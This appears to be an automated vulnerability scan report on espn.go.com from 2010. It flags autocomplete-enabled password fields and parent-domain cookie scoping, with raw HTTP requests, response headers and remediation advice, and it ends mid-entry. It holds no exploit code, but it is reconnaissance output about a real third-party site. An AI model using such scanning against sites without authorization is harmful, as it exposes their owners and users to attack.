The page contains a form with the following action URL, which is submitted using the GET method:
http://espn.go.com/espn3/index/_/sport/football
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:41:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:34:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=0E685EB3-A53C-4C06-B9CE-883700FE2534; path=/; expires=Sat, 13-Nov-2030 17:41:28 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:43:14 GMT Content-Length: 326636 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://espn.go.com/espn3/index/_/sport/basketball
The form contains the following password field with autocomplete enabled:
password
Request
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:31 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Set-Cookie: SWID=0EA55118-2954-4A4C-9FA9-217C970B6D8A; path=/; expires=Sat, 13-Nov-2030 17:40:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:50 GMT Content-Length: 186323 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL:
http://espn.go.com/espn3/index/_/sport/football
The form contains the following password field with autocomplete enabled:
password
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:41:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:34:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=0E685EB3-A53C-4C06-B9CE-883700FE2534; path=/; expires=Sat, 13-Nov-2030 17:41:28 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:43:14 GMT Content-Length: 326636 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /action/surfing/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 18:16:18 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 18:16:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=B9DBE756-AA84-49F9-8B28-E4094FD4AD9F; path=/; expires=Sat, 13-Nov-2030 18:16:18 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:24:38 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:11 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/ncfnation/tag HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:11 GMT Content-Type: text/html;charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=427C176E-6EA6-42A3-8194-2FBA103D60E1; path=/; expires=Sat, 13-Nov-2030 18:16:11 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:21:11 GMT InvH: blog-ncfnation Content-Length: 145036 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:11 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /college-football/boxscore HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:07:06 GMT Location: /ncf/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=E92872C4-BE12-4B2E-BB7D-0AA36023222C; path=/; expires=Sat, 13-Nov-2030 18:07:06 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/ncf/index ">/ncf/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /college-football/player/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:06:05 GMT Location: /ncf/players Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Set-Cookie: SWID=BF82B54E-3F4A-4244-B738-35CCD6477567; path=/; expires=Sat, 13-Nov-2030 18:06:05 GMT; domain=.go.com; Content-Length: 141 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/ncf/players ">/ncf/players </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:07:58 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /college-football/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:07:58 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Set-Cookie: SWID=EB51C60F-0E86-4F96-8B62-80B778BC8886; path=/; expires=Sat, 13-Nov-2030 18:07:58 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:15:49 GMT Content-Length: 83996 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:07:58 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:14:31 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /espn/e60/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:14:31 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Set-Cookie: SWID=8328CA99-7E19-45D9-B24B-026EDA221BDD; path=/; expires=Sat, 13-Nov-2030 18:14:31 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:13:37 GMT Content-Length: 51354 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:14:31 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn/feature/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 18:14:16 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=B0852467-1E4A-49A8-8A32-E9097717B47A; path=/; expires=Sat, 13-Nov-2030 18:14:16 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn/fp/pollDataGenUniversal HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:13:59 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 13 Nov 2010 18:13:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=91C3173E-DDD1-428F-BB2F-46CF326DCCC3; path=/; expires=Sat, 13-Nov-2030 18:13:59 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:16:14 GMT Content-Length: 184 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:11:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 18:11:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=0DBA0074-F9E1-4BE9-89D9-4EE91CB4BAF7; path=/; expires=Sat, 13-Nov-2030 18:11:26 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:13:41 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:10:17 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /espn/page2/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:10:17 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=728CC4E3-9BE6-4205-A3DF-E9DA0266E6C4; path=/; expires=Sat, 13-Nov-2030 18:10:17 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:11:23 GMT Content-Length: 204429 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:10:17 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:11:51 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /espn/wire HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:11:51 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=A19DEC16-4216-4DBE-A447-B0B9BD2BC0A7; path=/; expires=Sat, 13-Nov-2030 18:11:51 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:34:32 GMT Content-Length: 47922 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:11:51 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/blackout HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:42:46 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:42:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Set-Cookie: SWID=3E9E537B-9B7A-49DF-A4A1-D86A917AAE72; path=/; expires=Sat, 13-Nov-2030 17:42:45 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:51:05 GMT Content-Length: 3253 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:31 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Set-Cookie: SWID=0EA55118-2954-4A4C-9FA9-217C970B6D8A; path=/; expires=Sat, 13-Nov-2030 17:40:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:50 GMT Content-Length: 186323 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:41:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:34:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=0E685EB3-A53C-4C06-B9CE-883700FE2534; path=/; expires=Sat, 13-Nov-2030 17:41:28 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:43:14 GMT Content-Length: 326636 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/player HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:51 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Set-Cookie: SWID=5BDA550C-D9A4-4344-8666-B968112F604E; path=/; expires=Sat, 13-Nov-2030 17:40:20 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:41:12 GMT Content-Length: 21094 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Streaming Online - ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn3/search/indexFeaturedEvents HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:43:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:39:07 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=06B9ECB3-DAFE-4C19-9ABC-3DE2A1776375; path=/; expires=Sat, 13-Nov-2030 17:43:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:47:27 GMT Content-Length: 2527 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
{"featuredEvents":[ {"id":"65908", "name":"Indiana vs. #7 Wisconsin", "eventType":"live", "starttime":"Sat, Nov 13, 12:00 PM", "thumbnail":"http://a.espncdn.com/espn360/images/fb/ncaaf/65908_small.jp ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:09:54 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /golf/leaderboard HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:09:54 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=82326F9A-B7D8-4515-B91E-C9E9CD83EE83; path=/; expires=Sat, 13-Nov-2030 18:09:54 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:05:03 GMT Content-Length: 148067 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:09:54 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:27 GMT; Path=/; Domain=.go.com
DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:17:28 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /horse-racing/breederscup2010/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
